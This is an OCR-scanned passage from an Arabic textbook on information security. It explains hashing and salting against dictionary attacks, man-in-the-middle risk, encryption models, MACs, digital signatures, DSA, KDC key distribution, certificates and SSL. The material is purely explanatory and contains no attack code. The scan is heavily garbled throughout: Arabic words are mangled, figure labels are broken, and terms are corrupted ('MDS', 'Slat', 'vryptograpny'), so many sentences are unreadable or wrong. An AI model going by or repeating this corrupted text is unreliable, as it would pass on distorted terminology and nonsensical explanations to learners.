عليها By‏ أخرى واستبدال ال hash value‏ القديمة هذه احدیدق 5 إعادة إرسالا إلى ال .lreceiver‏ 


أرني كيف يتم هذا $..MITM‏ 


pa ge 


€ thy A 
UU ۱ 
pz EN } 
| اه چا‎ Vy 

تر ه- Ex.‏ 


و۱ 
AL‏ 


(b) Man-in-the-middle attack Source: Ref (7 
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وكيف RS‏ هذا النوع من ال هجمات؟ 


سنحتاج هنا لطريقة آمنة لنقوم بإرسال الرسالة مع ال hash value‏ إلى الطرف الآخر. 


الطريقة الأولى: 


<— Source A «1——— Destination B > 


هنا سنقوم باستخدام “Symmetric Algorithm”‏ 4223 البيانات GL! Js‏ إلى الطرف الآخرء هذه البيانات 
ستكون: (الرسالة + ال (hash value‏ وعند وصوفاء سيقوم الطرّف الآخر بفك الشفرة لِيَحصّل على الرسالة وال 
.hash file‏ 


US‏ بتطبيق ال Hash Function‏ على الرسالة ويقارن ال hash value‏ الناتجة بتلك القادمة مع الرسالة. 


الطريقة الثانية: 


a» E(K, H(M)) 


vryptograpny 
[361] 


T hijs ele Qe فقط!ء‎ hash code لتشفير ال‎ “Symmetric Encryption" هنا سنقوم باستخدام ال‎ 


تعدیل. وعند وصول البيانات» شیقوم الطرف الآخر بفك التشفير لِيَحصّل على الرسالة وال chash file‏ فیقوم بنقس 


الاجراء أيضاً JS EU‏ من سلامة الرسالة. 


الطريقة الثالثة: 


Compare 
H(M Il S) 


نلاحظ ظهور Input‏ جديد سيدخل مع ال Hash Function‏ أثناء إنتاج ال chash value‏ وهو ال (S)‏ هذا الحرف هو 
اختصار لكلمة “Salt”‏ 

ماهذا ال $..*Salt"‏ 

hash التي ستقوم بعمل ال‎ One-way function مع ال‎ input يتم استخدامها ك‎ Random data عبارة عن‎ 4l 
ليست ها علاقة مباشرة مع الرسالة أوال‎ hash value إرساله أو تخزينه. فينتج بذلك‎ al ÍI password للرسالة أو ال‎ 
تكمّن أهمية‎ hashing قمنا بالصاق بعض الأحرف الأخرى معها قبل إجراء ال‎ LY الداخلة في المعادلة!ء‎ 83 
“Dictionary Attack" ال‎ ole في الحاية من‎ Slat هذا ال‎ 


في مثالنا هذا.. 
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سنقوم بإرسال هذا ال Salt‏ إلى الطرف الآخر بمفرده» G3‏ ترس dj‏ الرسالة مع ال chash file‏ يقوم هو بتطبيق ال 


hash function‏ مع إدخال «Slat JI‏ ویقارن ال hash value‏ الناتجة بتلك القادمة مع الرسالة. 


$.."Dictionary Attack" ماهذا ال‎ 


©.. pla 


DICTIONARY ATTACK! 


RG 


Ul]‏ عملية تطبيق ال Hash Function‏ على كمية كبيرة من كلمات السر القترحةء یم وَضعها في ملف ctxt‏ فتقوم الأداة 
بعمّل hashing‏ لکل 45 ومُقارنة ال hash value‏ بال hash‏ المعطاة (EAM)‏ إلى أن e‏ تشابه بين أحد ال hash‏ 


5 وتلك الْعطاة!. 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماره‎ 


English 
Dictionary 


وهكذا تظهر فائدة ال Salt‏ في العملية!. 


فعدم استخدام ال des Salt‏ من عملية ال Dictionary‏ 


Without Salting 
.attack 


encrypt 
— من و‎ E استخدام "كلمات سر" بسيطة أو سهلة‎ Lal 
encrypt عملية کسرها آو تخمینها!.‎ 
ع سس‎ ^ aine ليق ال‎ a هذا شكل آخر يرضح‎ 
أثناء تسجيل دخول أحدهم إلى ال‎ Salt استخدام ال‎ 


:Server 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماره‎ 


Username=bob 
PasswordsFw1^tbT!3 


User www.contoso.com 


Step 1. The user logs in with his 
username and password. 


Retrieve stored hash and salt 
Step 2. The server retrieves the for user bob 
corresponding stored hash and 
salt values for that username Hash-d691f5ef... 
from the credential database. Salt-9tOM&Tc3 
www.contoso.com Credential database 


Compute hash of 
^| 
Step 3, The server concatenates E 
the password provided by the 
user with the retrieved salt, then Hash=d691fSef... Cy 
computes a hash of this value. 
www.contoso.com Hash 


function 


Step 4. If the new recomputed 
hash matches the hash 15 the computed hash equal tà 
retrieved from the credential 3 Pea e 
database, the user is سارها‎ = 
authenticated. 
www.contoso.com User 
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لاحظ في الخطوة الثالثة كيف قام ال Server‏ بعمل “Concatenate”‏ بين ال password‏ وال «salt‏ ثم تطبيق ال 


Hashing Function‏ عليهم ومقارنة النتيجة بتلك all‏ لديه. 


وماهذا ال $.."Concatenate"‏ 


operator (+) باستخدام ال‎ “two strings end-to-end" باختصار.. عملية دمج‎ lel 


A 
$ 


سَنخرج إلى فاصل قصير ثم نعود من جديد.. 


Confidentiality, Authentication, and Signature 
سوم بمُراجعة سَريعة لنؤكد على هذه الفاهيم » وهي:‎ 
Confidentiality, Authentication, Nonrepudiation (Digital Signature) 


الشكل الأول: 


Destination B ——~‏ له -———— Source A‏ له 
M‏ ® مس M‏ 
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هذا الشكل x‏ عن ال ed “Symmetric Encryption”‏ يبدو bool,‏ استخدام نفس ال Key‏ في عملية التشفير 
وفك التشفير!ء هذا ال Key‏ يتم تبادله فيه| بينهم عبر قناة آمنة سنتكلم عنها لاحقاً. 


الشكا الثاني: 


H—9— 8 —$ t 


PU, E(PU,, M) PR, 


هذا الشكل يعبر عن ال OY “Asymmetric Encryption”‏ الطرف الأول يقوم بتشفير الرسالة باستخدام ال public‏ 
key‏ الخاص بالطرف الآخر. 


هذا النموذح قق لنا ال Confidentiality‏ ولکن لا تحقق ال Authentication‏ ..1 


ول اذا لا 344 ال f Authentication‏ 

با أن ال key‏ المستخدم 41a)‏ )55280 هو ال B's Private Key"‏ قهذا يعني أنه لا أحد سواه RAGS‏ من فتح 
الملف!» (ay‏ قام B‏ بإرسال ال public key‏ الخاص به إلى » فرب a‏ هذا المفتاح JG‏ أحدهم فيتمكن من تشفير أي 
بيانات ويقوم بارساها ل eX B‏ أنه . 

والآن ماذا سنفعل Em‏ ال Authentication‏ ؟ 

هذا ما سيأتي به لنا الشكل الثالث.. 


Cryptography 
[367] 


الشكل الثالث: 


H—9— BR —$—t 


E(PRa, M) 


قمنا بتحقيق ال Authentication‏ عن طريق جعل الطرف يقوم بتشفير الرسالة باستخدام ال el! private key‏ 
به هو cl‏ وهذا ilas ON‏ سرقة ال private key‏ الخاص بأحدهم آصعب بکثر من سر قة ال „public key‏ 


Signature وال‎ Authentication ال‎ UJ dm c وبالتالى هذا النمو‎ 


عفواً.. ولكن كيف gat‏ هذا النموذج ال Signature‏ .؟ 

Le Ja]‏ كلقا GE CAS‏ هذا Authentication Jl ge‏ . ستأخذ مثال لنفهم منة E CAS‏ لنا الأخيرة. ال 
Signature‏ هدفها إثبات آماع الجميع dm pa A Ol‏ من قام بارسال هذه الرسالة إلى B‏ 

ماذا لو كانت هذه الرسالة تحوي مَعلومات حَسَّاسَةء أو قرارات مهمة!ء ربا oed‏ فرصة للطرف B‏ بالتلاغب gu ob‏ 


لنا برسالة AGI Pig‏ قام بارساها eli SI, ld‏ بفك تشفيرها بال public key‏ الخاص ب A‏ 


مالحل هنا؟ 
الحل هنا أن نضع قاعدة يقوم الطرف B‏ بمقتضاها امتلاك gH‏ في الإدعاء ob‏ الرسالة آتت من cA‏ وهو أن يُظهر UJ‏ 
ال Ciphertext‏ القادم له من A‏ 
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ولماذا ال Ciphertext‏ بالذات؟ 

«Ciphertext فهو الشخص الوحيد الذي يستطيع تكوين ال‎ «Private Key هو الوحيد الذي يمتلك ال‎ A أن‎ le 
من الجهاز!.‎ private key وليس لأحد سواه ذلك!» إلا إذا تمت سرقة هذا ال‎ 

وبالتالي تواججد هذا ال Ciphertext‏ في حد ذاته عند B‏ هو دليل GIS‏ أن A‏ هو من أرسل هذه الرسالة!. 

Ex‏ أن ال Signature‏ تدعم مفهوم ال tu «Nonrepudiation‏ تعني Jat e^‏ من الإدعاء بعدم إرساله 


للرسالةء ومنع ill‏ من ادعائه بعدم وصوها إليه". 


ولكني لاحظت عدم تحقيق ال Confidentiality‏ في هذا النموذج!.. لاذا لم تتحقق؟ 

OY‏ عملية فك الشفرة مُعتودة على مرحلة واحدة وهي امتلاك ال public key‏ الخاص بالطرف .A‏ فإذا وقع هذا ال 
public key‏ بيد أحدهم فسيتمكن من رؤية الرسالة» وهذا خرق لل .Confidentiality‏ 

ی مثال ال «Student Record‏ والتي N‏ يتم ce!‏ لأحد بالاطلاع عليها إلا الطالب وأولياء آموره و جهة توظيفه. 
واطلاع غیرهم علیها يدل على وجود خلل في موثوقية هذا العهد!. 


كيف gins‏ ال Confidentiality‏ ]13 .5$( مع الابقاء على بقية الخصائص.. 


"الشکل الرابع سيجيب علینا" 
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الشكل الرابع: 


PR, E(PRa, M) PU, E(PU,, E(PRa, M)) PR, E(PRa, M) PU, 


لقد قمنا باضافة مرحلة أخرى آثناء عملية التشفیر وفك التشفی 

سیقوم الطرف A‏ بالتشفیر على مرحلتین الأولى Private Key JU‏ الخاص lips c‏ یکون قد حقق ال Signature‏ 
وال Authentication‏ . 

ثم يقوم بالتشفير bpo‏ أخرى باستخدام ال Public Key‏ الخاص بالطرف B‏ ليكون بهذا قد GE‏ ال 
.Confidentiality‏ هذا لا يعني أن هذا النموذج هو d phai‏ لاحظ أنه يستهلك Resources‏ عالية بسبب إجراء 


"أربع عمليات" في كل مرة يتم إرسال رسالة فيها. 


Message Authentication Code (MAC) 


والآن وبعد معرفتنا الجيدة e seal‏ ال Authentication‏ يُمكننا الانتقال إلى هذه التكنولوجيا الستخدمة لتحقيق ال 
Authentication‏ بین طرفين» وهی ال .MAC‏ 


ما هذا ال $..MAC‏ 
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إنه الشىء الذي ينتج بعد تطبيق ال SHEL) Secret Key‏ بين طرفين) على الرسالة أو البيانات al dl‏ إرساهاء فيتم 
إرساله مع الرسالة إلى الطرف الآخر. 


إنه عبارة عن ie tal ۳160-9126 block of data”‏ عليه "Cryptographic checksum"‏ 
أو للاختصار MAC‏ 
cla]‏ يُمكِئنا التعبير عن هذا الإجراء بالمعادلة التالية: 


MAC =C(K,M) 


هذا ال MAC‏ الذي سنقوم بإرفاقة مع الرسالة» سنحصل عليه عند قیام ال «MAC Function (C)‏ بتطبيق ال Key‏ 
(K)‏ على الرسالة (M)‏ 

يقوم الطرف الا خر بتطبيق ال Lat MAC Function‏ على الرسالة ifi‏ لإنتاج ال MAC‏ ومقارنته بذلك الذي 
آتی بصحبة الرسالة. 

سنعرض لك بعض الأفكار لتطبیق ال MAC‏ 


نبداً بالشکل التقليدي: 


Cryptography 
[371] 


«— Destination B جل‎ 


4— — — — — Source A 


Compare 


هذا الشكل يبدو Dont‏ ومباشر في تطبيقه لل MAC Function‏ و عمل ال Calculation‏ لل MAC‏ في الناحية 
الأخرى ثم عمل المقارنة بينهم. 


الشكا الثاني: 


Compare 


E(K>, [MI C(Ki, M)]) & 


/ 
C(K,, M) 


قمنا LA‏ بإضافة c las‏ بعد استخدام ال MAC Function‏ لل Key‏ في cls}‏ ال ied MAC‏ باستخدام Key‏ آخر 
لتشفير (الرسالة + ال (MAC‏ لنعطی الحاية للرسالة في حالة التقاطها!. 
هذا يعنى أننا حققنا خاصيتين: 


ال Authentication‏ حققناه ولكن لل ol «plaintext‏ للرسالة قبل تشفيرها!. وال Confidentiality‏ عن طريق 
استخدام ال .K2‏ 
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7 
C(K,, E(K>, M)) 


لاحظ آننا LA‏ قمنا بتشفير الرسالة أولاً ثم bad‏ بتطبيق ال MAC Function‏ على الرسالة Hi itll‏ 
eu‏ هذا النمو LJ dae c‏ ال Authentication‏ لل «Ciphertext‏ وال Confidentiality‏ عن طريق التشفير 


باستخدام المفتاح .K2‏ 


Digital Signature 


ال Digital Signature‏ هى عبارة عن تطبيق ال "Public Key Cryptography"‏ مع ال “Hashing Function”‏ 
وذلك لتحقيق ثلاثة أهداف.. هى: 
Authenticity‏ 


فهی إثبات "Proof"‏ لهوية الشخص الذي قام بإرسال هذه ال Document‏ 
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Integrity 
أو أثناء رحلتها‎ Signing تعديل أو تغيير أثناء ال‎ T تتعرض‎ i هذه‎ Document إنها تعطينا إثبات وتأكيد أن ال‎ 


إلينا. وهذا بسبب Éles‏ مع كل Binary Bit‏ هذه ال Document‏ اراد إرساطاء ما یکشف أي عملية دمج أو حذف 


أو إضافة حرف واحد لهذه ال Document‏ بعد تطبيق ال Algorithm‏ عليها. 


Nonrepudiation 
بهذا مُستئّد‎ JRE بكل كلمة فيها!ء‎ Document لإرساله هذه ال‎ (Jor Al وهذه خاصية مُهمة» حيث تضمن عدم إنكار‎ 
رسمي یمکن إدانته به!.‎ 


2& عملية الادانة القضائية هذه فیها JIB‏ 
لا of Set‏ تعتد هات الرسمية بهذه التکنولوجیا وحدها کاثبات OE‏ عل الرسل!. حيث یستطیع ea M‏ أن 
یتملص من هذا الاتبام عبر ادعائه باصابة جهازه الشخصي ب "See "Malware"‏ 


هذا شکل یوضح تطبیق ال Digital Signature‏ با حقق هذه | خصائص الذکورة: 
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Understanding Hacking and Information Security المعلو‌ها ند‎ csalo القرصنة الإلكترونية‎ 


o Digital Signature Creation 


Rose Hemsworth's 
Private Key = 
Sent to receiver 
7 004044040 i ? 
ANN of ۳ = 
11— = ys ALS oor io 0 | — 
Document 


J, Ww 


Rose Hemsworth Document Fingerprint Digital Signature Document Kevin Northmar 


@ Digital Signature Verification 


If same, document is 
authentic and Rose signed 


Rose Hemsworth's aia nE it, otherwise document can't 
gl Public Ke Fingerprin be trusted 
Yj ۳ 0 
0 ا‎ 4 
e 
Kevin Northman Document Document Fingerprint Verified 


يوضح الشكل خطوات تطبيق ال Signature‏ على وثيقة تقوم السيدة "Rose"‏ بإرساطا إلى السيد "Kevin"‏ 


فقامت بتطبيق ال Nui “Hash Function"‏ على الستند» لتحصل على ال d «Hash value‏ تقوم بتشفيرها باستخدام 


ال Private Key‏ وارساضا إلى السيد 0 فیقوم هو بعكس الخطوات ومقارنة ال RON Hash value‏ بالذي 


استخرجه ليتأكد من سلامة المستند. 


نعرض فى الصفحة التالية شكا آخر لنفس العملية: 
نعرض 3 : خر : 
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Understanding Hacking and Information Security aslagleall القرصنة الإلكترونية من‎ 


Bob Alice 


4. 


۷ | 
ba 
public 
s| key 
Cryptographic 
" 
hash 
amci 
Bob’s 
private " 
۱ ۱ Pt ل‎ 
E2 
Return 
Bob's signature 
signature valid or not valid 
for M Source: Ref (7) 


" بعد تطبيق ال Hash‏ باستخدام ال j| MDS‏ 511۸1 أو ۰۹11۸2 225 | على ال «(h) hash value‏ وبعد 


التشفير نحصل على ال S)‏ 
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" في الناحية الأخرى Alice SLi‏ ال Key‏ 1243 على ال (h^)‏ 
" فتقوم بتطبيق ال MDS‏ أيضاً على (M) JU. JI‏ فينتج ال AW «(h)‏ بال (h^)‏ 


Digital Signature Standard (DSS) 


ما هذا ال (DSS)‏ .* 


Digital Signature Security Standard (DSS) is a technology for creating digital signatures that was 
developed by the National Security Agency and adopted by the United States government as its 
digital-signature standard. DSS defines the Digital Signature Algorithm (DSA), DSA does not 
encrypt message digests with the private key or decrypt the message digest with the public key!. 
it uses special mathematical functions to generate a digital signature composed of two 160-bit 
numbers (s & r) that are derived from the message digest and the private key. Then it uses the 
public key to verify the signature. 


كيف تعمل هذه ال f Algorithm‏ 

le]‏ تستخدم ال hash code co Hash Function‏ من الرسالة ERU‏ إرساطاء e‏ پستخلم ال hash code‏ هذا ك 
Il] input‏ | ال (Signature Algorithm)‏ 

تعتمد هذه ال le Signature‏ استخدام ال c 23:1 (3 private key‏ وتعتمد على ال public key‏ في فك التشفیر إلا 
آنها تستقبل عنصر ثالث أيضاً في هذه العملية» وهو ال Global Public Key (Pug)‏ 


Al‏ عبارة عن مجموعة من ال parameters‏ التی يستخدمها كلا الطرفين. 
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Compare 


DSA approach 


^ 
- 


في النهاية cx‏ عن هذه ال Algorithm‏ قيمتين يتم إضافتهم مع الرسالة وهم (S)‏ و At)‏ 

هيا JASI‏ ني التفاصيل: 

يقوم الطرف الأول بعمل بعض العمليات الحسابية لإنتاج ال (5) وال (2)؛ 

هذا ال ۲ وال s‏ سَيكونا نواتج ل js functions‏ مها ال ay "public key components"‏ ال «(p.g;g)‏ وال 
private key‏ الخاص بالطرف الأول $5 54 له ب (x)‏ وال hash code‏ الخاص | JL. JU‏ ونرمز له ب Pr HM)‏ 


رقم عشوائي نستخدمه لكل عملية Sign‏ نقوم بها ونرمز له ب (kK)‏ 


:(r) وال‎ (s) لتكوين ال‎ parameters شكل يوضح كيف تدخل هذه ال‎ die 
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p q £ 


| ا 
q‏ 


(a) Signing Source: Ref [7 


تدخل الرسالة M‏ إلى ال hash function‏ ليتم انتاج ال hash code‏ تم يدخل الأخير في معادلة الخصول على ال )5( 
cu‏ نستخدم ال 1 آیضاً مع ال . لاحظ Of‏ القيمة التي ستحدد سَلامة الرسالة LA‏ هي ال E)‏ وهي التي سيقوم 
الطرف الثاني بإجراء حساباته من أجل اختبارها!» وببعض التدقيق على هذه ال Algorithm‏ الرائعة ستجد أن ال (r)‏ 
هلو له فیک عل الرسالة GM)‏ شيء!» بمعنى of‏ ال (M)‏ ليست من ضمن الدخلات الخاصة بهاء وهذا ما يزيد 
قوتها!. 

وعندما تصل الرسالة إلى الطرف الآخرء سيقوم بعمل بَعض الحسابات لإنتاج قيمة نُسميها (V)‏ سيقوم بمقارنتها بال 
(r)‏ القادمة من الطرف الأول» ويجب أن يتشابهاء وإلا فيتم رفض الرسالة. 
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uj = [H(M)w)] mod q 
uy = (r)w mod q 
v= [(g"1y"2) mod p] mod q 


(b) Verifying Source: Ref 


Key Distribution 


کنا نتحدث في الفقرات الماضية عن ال Symmetric Cryptography‏ وال Asymmetric Cryptography‏ وكيف 


يتم تحقيق الهدف من خلال تشفير البيانات اراد US‏ بين الأطراف باستخدام ال Keys"‏ ولكن كيف ستتم عملية 


إرسال ال Key‏ المتفق عليه إلى الأطراف المشتركة في العملية؟. 


هذا ما سنتحدث عنه هنا كى تكتمل لدينا الصورة. سنتكلم عن سيناريو لعملية ال Key Distribution‏ باستخدام ال 


as مر $ آخر‎ Asymmetric Encryption مرق و باستخدام ال‎ Symmetric Encryption 
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Using Symmetric Key Encryption 


-«————— Source A له‎ Destination B ——~ 


هذا شكل ال Symmetric Encryption‏ التقليدي» ونرید هنا أن یصل هذا ال key‏ للطرفین بشکل آمن!. 

سنطلق على هذا ال key‏ بالأعلى "Session Key"‏ وهو ال key‏ الستخدم في عملية تبادل البيانات بين الطرفين A‏ و 
8 أطلقنا عليه Session‏ لأنه سيتغير عند عملية بدء Session‏ جديدة. هذا ينطبق على ال Applications‏ التي 
تستخدم ال TCP‏ كبروتوكول لنقل البيانات بشكل عام. 

سيقوم A‏ بالتوافق على Key (Ka)‏ آخر aUi‏ عليه c Master Key”‏ بينه وبين طرف ثالث (KDC)‏ وأيضاً الطرف 


(Kb) أيضاً‎ key على‎ (KDC) سيتوافق مع هذا ال‎ B 


A UJ‏ مثال: 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومات‎ 


(1) ID | P anii 


(2) E(K,, [K, ll ID, V ZDg II N, ]) M E(K,, (K, IDAD 


Key distribution 
steps 


3) E(Ks, [K, Il IDA 


N 
(4) E(K,, Na) نے‎ 


po 
B 
icati 5) ECK,, f(N» 
Authentication (8) E( (N2)) 


steps Source: Ref [7) 


سيقوم الطرف A‏ بمشاركة ال KDC‏ وهو اختصار ل (Key Distribution Center)‏ بوفتاح Lal (Ka)‏ الطرف B‏ 
سيقوم بنفس الأمر مع هذا ال KDC‏ قبل أي عملية تواصّل فعلية بين ۸ و B‏ 
وعندما يَرغب الطرّف A‏ بفتح có Session‏ الطرف B‏ سيبدأ بطلب "Session Key"‏ المستخدم في هذه ال 5655101 


من ال .KDC‏ 


كيف تتم عملية طلب ال Session Key‏ هذه؟ 


سيدا الطرف A‏ ولنفرض أنه من يريد بدء Session‏ مع الطرف B‏ 
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سيبدأ بارسال طلب إلى ال cie KDC‏ منه «Session Key‏ هذا الطْلّب يتكون من ثلاثة متغيرات. 

الأول هو ال IDA‏ ویعنی ols Identity of A‏ يكون ال Address‏ 1۳ الخاص به على سبيل JEM‏ والثاني هو ال IDB‏ 
oS‏ الطرف B‏ هو المعني بإنشاء الإتصال الامن هنا!. 

والثالث هو ال ..NI‏ هذا pe‏ آشبه بال Sequence number‏ (المستخدم من قبل بروتوكولات التواصل لعمل 


iis packets | J tracking‏ سيكون ال NI‏ هنا رقم عشوائي. 


فيقوم ال KDC‏ بالرّد عليه بإرسال رسالة J‏ وقد تم تشفيرها بال (Ka)‏ فيتمكن الطرف A‏ من فكها لأنه قد اتفق مع 
ال KDC‏ على هذا ال Key‏ من قبّل. 

هذه الرسالة بَعدَ فكها ILS‏ منها عدة مُتغيرات أيضاً.. 

qm‏ له ال KDC‏ ال Session Key‏ الذي يريده «XJ A‏ ال Session‏ مع B‏ وهو ال (Ks)‏ ويقوم بإضافة محتويات 
الرسالة السابقة التي أرسلها له A‏ وهذا للتأكيد على أن هذا ال Response‏ خاص بال Request‏ الذي أرسلته di‏ 
الآن!» وليس لطلب غيره» وهذا يظهر من خلال إرجاع ال KDC‏ نفس الرقم العشوائي 71 إلى ۸ کا هو da‏ 
الرّسالة أيضاً ال 16» وهو ال Key‏ الذي أعطاه ال KDC‏ للطرف 8. 


ولماذا یعطی ال KDC‏ للطرف A‏ ال Kb‏ هذاء فهو لا Falt‏ 
هذا لكى يقوم A‏ بإعطاء الطرف B‏ ال Ks‏ وهو ال “Session Key"‏ فيقوم بإرساله في رسالة $t‏ 


بال Kb‏ کی يتمكن B‏ من فكها والحصول على ال Ks‏ الذي سيستخدمه A‏ فيا بعد لارسال مايريد للطرف 8. 
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لاحظ أن الخطوات الثالثة والرابعة والخامسة تم وضعهم لتحقيق لل “Authentication”‏ بين الطرفين A‏ و B‏ فقطء 


وليست من ضمن عملية ال Key Distribution‏ 


Using Asymmetric Encryption 
فك التشفر.‎ ilas فى‎ Public Keys وهو الذى نستخدم خلاله ال‎ Asymmetric Encryption تكلمنا عن ال‎ 
A عن هو او 3 * جنال‎ 


لل ل الال 


PU, E(PU,, M) PR, 


ويمكن CY‏ طرف إرسال ال Public Key‏ الخاص به GY‏ طرف يريده كا يظهر في الشكل التالي» وهذا يعد إجراء 


غير آمن!» فربم| يقوم أحدهم بإرسال أي Public Key‏ والإدعاء أنه A‏ خصوصاً في حالات المجموعات البريدية. 


PU, 

zt PU S 
مسر‎ ai 
A 9 
eu x 
P U, 

"ae ۹ 
PU, 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأحن المعلوماه‎ 


n PU, ۱ ID,‏ م 
q A (07 B‏ 
An NN E(PU,, K,) ll‏ 


وهذا مثال LL‏ يوضح إرسال ال (Ks)‏ باستخدام ال .Asymmetric Encryption‏ يقوم هنا الطرف A‏ بإرسال ال 
Public Key‏ الخاص به (PUa)‏ إلى الطرف 8 فيقوم B‏ بإرسال ال Ks‏ وهو ال "Session Key"‏ إلى A‏ بعد تشفيره 
باستخدام ال (PUa)‏ فيقوم A‏ بفك التشفير باستخدام ال Private Key‏ الخاص به.. ولكن من الُمكن هذا السيناريو 


أن يتعرض لل MITM Attack‏ بهذا الشكل: 


Darth modifies 
message from Bob 
to Alice 
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سيقوم السيد GÀ Darth‏ بالإمساك بال PUa‏ والاحتفاظ ca‏ ثم يقوم بعمل Public Key J generate‏ جديد 5 AL,‏ 
إلى cAlice‏ تم في العودة سيأتي ال Ks‏ له يأخذ a Bend‏ قوم بتشفيره bys‏ أخرى باستخدام ال PUa‏ ويُعيد 


Bob إلى السيد‎ JU, j| 


وبالتالي يلزم وجود طريقة آمنة pla‏ بتوزيع ال Public Keys‏ بين الأطراف دون تعرضها للخطر!. وهذا سيتم 
بوجود طرف ثالث كأن يتم تسليم ال Key‏ بشكل يدويء أو باستخدام أحد الطرق التالية في iles‏ إيصال ال PUa‏ 


إلى B‏ تم إرسال ال lè Ks‏ بعد. 


Distribution of Public Key Methods 


= Public-Key Authority 
= Public-Key Certificate 


Using Public-Key Authority 
le Central Authority لنفرض وجود‎ :Public-Key Authority سنتكلم الآن عن سيناريو باستخدام ال‎ 


[P معلو‎ Authority الخاص ہذہ ال‎ Public Key ويكون ال‎ «Clients JL الخاصة‎ Public Keys به ال‎ os Server 


لديهم. 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلومانه‎ 


directory 
ü au 
CD 


Source: Ref (7) 


~ 
> ١ 


utho 


(1) Request ll Time, ست‎ (4) Request ll Time; 
(2) E(PR ,بز‎ [PU, ll Request ll Time; ]) 


(5) E(PR auh» (PU, || Request Il Time»]) 


ا سف ده Ae sl‏ 


(6) E(PU,, ] N, No) 


nitiato 
A 


(7) E(PU;, N2) 


Source: Ref (7) 
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يظهر في الشكل الخطوات xal‏ في هذه العملية» تبدأ بقيام A‏ وهو ال Initiator‏ بإرسال طلب إلى ال Authority‏ 
یطلّب ال Public Key‏ الخاص بالطرف .B‏ فترد عليه بإرسال ال Public Key‏ الخاص بالطرف B‏ برسالة مُشفرة 
بال «Authority JL , 2U-I Private Key‏ ويا أن A‏ 4.9 ال Public Key‏ الخاص ما فسيتمكن من فك التشفير. 
A p‏ بإرسال ال ID‏ الخاص به مع رقم عشوائي يقوم باختیاره N1‏ إل GB‏ رسالة att‏ 5 باستخدام ال -PUD‏ 
فيقوم B‏ بطلب ال PUa‏ من ال Authority‏ هو أيضاً.. و يرسل إلى A‏ نفس الرقم العشوائي NI‏ ويقوم بعمل 
|J4 Increment‏ الرقم بواحد مثلا اسن 2 ویر سله tad‏ مع الأول كنوع من ال -Authentication‏ يتم إرسالهم 
في رسالة مشفرة بال PUa‏ كما يظهر في الخطوة رقم )6( 

T) هو موضح بالخطوة رقم‎ (Sel مر أخرى ليؤكد له أنه قد وصل إليه بالفعل‎ N2 بإرسال الرقم‎ A عليه‎ a2 


Using Public-Key Certificate 
بين أي طرفين يودان التواصل بشكل آمن فيا‎ "public key distribution" تكلمنا في الطريقة السابقة عن عملية ال‎ 
وبإجراء بعض التدقيق على السيناريو‎ -Public Key Authority وهی ال‎ Trusted Third Party بينهم عن طريق‎ 


السابق سنلاحظ أنه في كل مرة يُريد الطرف ۸ التواصل مع أي طرف آخر c. gea‏ عليه الإتصال بال Autority‏ 
وهذا الاجراء مُستهلكا للوقت. 


JSS للأطراف التواصل فيها بينها‎ Certificates هذه ال‎ e Certificates على هذا الأمر باستخدام ال‎ SKE e 
.Public Key Authority دون الحاجة للتواصل خلال ال‎ Public Keys ال‎ 
Certificate هذه بعض الخصائص الُمَيِّرّة لل‎ 
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des A والاطلاع من خلاها على بيانات الطرف‎ Certificate يستطيع قراءة ال‎ A طرف يتواصل مع‎ gY. 
.4 الخاص‎ Public Key ال‎ 

: أي طرف يستطيع التحقق من ال Authority‏ الانحة هذه «Certificate JI‏ بمعنی التأكد من أن هذه ال Certificate‏ 
ليست مُزيفة!. 

. أي طرف أو مُستخدم پمکنه ioc‏ من تاريخ أو صلاحية هذه ال Certificate‏ بالطبع يعد التاريخ من الخصائص 
المهمة للشهادات. تُلاحظ رفض الُتصفحات تتح بعض مواقم الإنترنت في حالة عدم ضبط ساعة جهاز الكمبيوتر, 
Bake‏ یعتبر حينها أن ال Certificates‏ مُنتهية الصلاحية!. 


. 54 فقط لل Certificate Authority‏ عملية إنشاء أو تجديد ال Certificate‏ 
ویعتر الشكل التالي عن عملية حصول كل منهم على ال Certificate‏ الخاصة به من ال ‘Certificate Authority‏ 


Certificate 


Qd Authority 
PU, " d N PU, 


Ca = E(PRau, [Ty ll IDA ll PUZ) 


P Cp = E(PRayth> [T> ll IDg ll PUp]) 


(a) Obtaining certificates from CA 
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یقوم الشخص بإرسال ال Public Key‏ الخاص به إلى ال «CA‏ وتقوم هي بإرسال Public Key (PUauth) J!‏ 
الخاص بها إليه. ثم تتم عملية إنشاء الشهادة داخل ال CA‏ بتطبيق مجموعة من الخطوات» وبعدها تقوم بإرساها إلى 
الشخص ذاته كما يظهر بالشكل» على هيئة رسالة 32255 بال PUauth‏ وما بيانات هذا الشخص من إسمه أو ID‏ 
الخاص cu‏ وال Public Key‏ الخاص به» وشيء أخير 442 | Timestamp (T)‏ وهو field‏ يعر عن تاريخ صدور 
الشهادة ویستخدم من قبل الطرف الستلم للتحقق من ال oid Currency‏ الشهادة. 

المعادلة التالية تعبر عن عملية ال Decryption‏ التي تتم بواسطة آي طرف عند استلامه ال Certificate‏ الخاصة 
بالطرف ۸: 

D (PUauth, Ca) = D (PUauth, E (PRauth, [T || IDA || PUa]) = (T || IDA || PUa) 

فيقوم بعمل Decryption‏ لما باستخدام ال Public Key‏ الخاص Authurity JL‏ ليتمكن من رؤية بيانات الشهادة 


وال Public Key‏ الخاص بالطرف ۸. 


الشكل يوضح تبادل الأطراف ال Certificates‏ بعد اعتمادها من نفس ال CA‏ 
pone ee‏ 
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Inside Secure Socket Layer (SSL) 


پستخدم ال SSL‏ أو ال TLS‏ في تشفير البيانات بين ال Web Servers‏ وال Browsers‏ عبر الإنترنت. وذلك بقيامه 
بإجراء التوافق بين الطرفين على أنواع ال Algorthims‏ الْستخدمة في تأمين الاتصال وترتيبهاء ومن کم BLE‏ البيانات 
بأمان. 

info.ssl.com مقدمة سريعة عنه من موقع‎ die 


SSL is the standard security technology for establishing an encrypted link between a web server and a 
browser. This link ensures that all data passed between the web server and browsers remain private and 
integral. SSL is an industry standard and is used by millions of websites in the protection of their online 
transactions with their customers. 


To be able to create an SSL connection a web server requires an SSL Certificate. When you choose to 
activate SSL on your web server you will be prompted to complete a number of questions about the 
identity of your website and your company. Your web server then creates two cryptographic keys - a 
Private Key and a Public Key. 


The Public Key does not need to be secret and is placed into a Certificate Signing Request (CSR) - a data 
file also containing your details. You should then submit the CSR. During the SSL Certificate application 
